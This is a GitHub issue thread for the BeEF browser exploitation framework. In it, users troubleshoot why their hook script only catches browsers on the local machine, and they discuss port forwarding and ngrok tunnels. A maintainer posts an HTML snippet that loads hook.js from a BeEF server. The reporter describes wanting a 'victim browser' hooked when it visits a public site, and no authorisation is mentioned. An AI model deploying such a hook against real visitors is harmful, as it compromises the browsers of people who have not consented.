-
Notifications
You must be signed in to change notification settings - Fork 2.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
beef hook working on local machine, but not on external machines #1589
Comments
Same is happening with me. I uploaded the index.html to a website hosting site (000webhost.com) and the html contents are being displayed, but the browsers other than the host machines aren't visible :( |
Which HTML file? |
The file with the hook, index.html. Thanks for replying bruv, I figured out I wasn't Port forwarded for it to work on WAN, but I port forwarded port 80 and still no use :( |
Do you mean the demo If you want to host the script elsewhere, you need to use the BeEF script: <html>
<script src="http://beef.local.ip.address.here:3000/hook.js"></script>
</html> |
@TheUndeadPriest check here for info on configuring for port forwarding : https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat |
I hosted the file with a script in it, and the html file is made by me in the var/www/html folder. Anyways thanks for replying and I will look into the port forwarding thread, is there anyway I can contact you because most of the time in most pentesting groups I don't get a reply at all :( I promise I won't bother you much |
@TheUndeadPriest the #beefproject channel on Freenode IRC is probably best, but if you can find my twitter or email you're welcome to try contacting me there. |
Thanks a ton bruv |
Bruv I decided to edit the .yml file of ngrok and add multiple tunnel for port 80 and 3000 but it shows : Failed to save authtoken to configuration file '/root/.ngrok2/ngrok.yml': yaml: line 5: found character that cannot start any token Why is it so? |
@TheUndeadPriest you didn't mention you were using ngrok. A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues: As for your error |
So I edited the .yml file like this- tunnels: Now I need to put "80" "3000" and "http" in quotes like this? Or the entire code? I am kinda noob at this so please have patience _/'_ |
@TheUndeadPriest I have no idea. I don't use ngrok and this isn't an issue with BeEF. The error received says line 5 is the issue. At a guess, it's because of the You should read the ngrok documentation. Additionally, your indentation is messed up. tunnels:
first_app:
addr: 80
proto: http
second_app:
addr: 3000
proto: http |
this video explains it all https://www.youtube.com/watch?v=6Jr0i2GKKhA |
@ko3nd3drumm3r please make the video public so that I can see it. |
the execute button is missing. |
for some reason my index.html is on read only and I can't edit it some1 please help |
It may be owned by a different user. Change the file permissions or edit the file using sudo/root. |
yeah thats what i need how do i change the file permissions?
…On Thu, Jun 15, 2023 at 1:52 PM bcoles ***@***.***> wrote:
for some reason my index.html is on read only and I can't edit it some1
please help
It may be owned by a different user. Change the file permissions or edit
the file using sudo/root.
—
Reply to this email directly, view it on GitHub
<#1589 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/BAQSORD6F5X2BVEXBQXDST3XLJTHDANCNFSM4FKBXS7Q>
.
You are receiving this because you commented.Message ID:
***@***.***>
|
also do u have discord i was wondering if we could call and i screen share
and u help me out?
…On Fri, Jun 16, 2023 at 11:57 AM Swiftyon dararo ***@***.***> wrote:
yeah thats what i need how do i change the file permissions?
On Thu, Jun 15, 2023 at 1:52 PM bcoles ***@***.***> wrote:
> for some reason my index.html is on read only and I can't edit it some1
> please help
>
> It may be owned by a different user. Change the file permissions or edit
> the file using sudo/root.
>
> —
> Reply to this email directly, view it on GitHub
> <#1589 (comment)>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/BAQSORD6F5X2BVEXBQXDST3XLJTHDANCNFSM4FKBXS7Q>
> .
> You are receiving this because you commented.Message ID:
> ***@***.***>
>
|
Verify first that your issue/request has not been posted previously:
Ensure you're using the latest version of BeEF.
Environment
What version/revision of BeEF are you using?
0.4.7.0
On what version of Ruby?
2.5.1p57
On what browser?
Firefox ERS
On what operating system?
Kali Linux
Configuration
Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
BeEF Configuration file
beef:
version: '0.4.7.0-alpha'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
Are you using a non-default configuration?
public: "aczero.company.com"
public port:"3000"
Have you enabled or disabled any BeEF extensions?
No.
Summary
Please provide a summary of the issue.
The hook on my website will only work on my local machine, but not remotely on external devices.
I have already enabled public ip/hostname
Expected Behaviour
What was the expected result?
the victim browser would be hooked upon visiting aczero.company.com and appear in online browsers.
Actual Behaviour
What was the actual result?
victim browser was not hooked
Steps to Reproduce
Please provide steps to reproduce this issue.
Additional Information
Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screenshots.
The text was updated successfully, but these errors were encountered: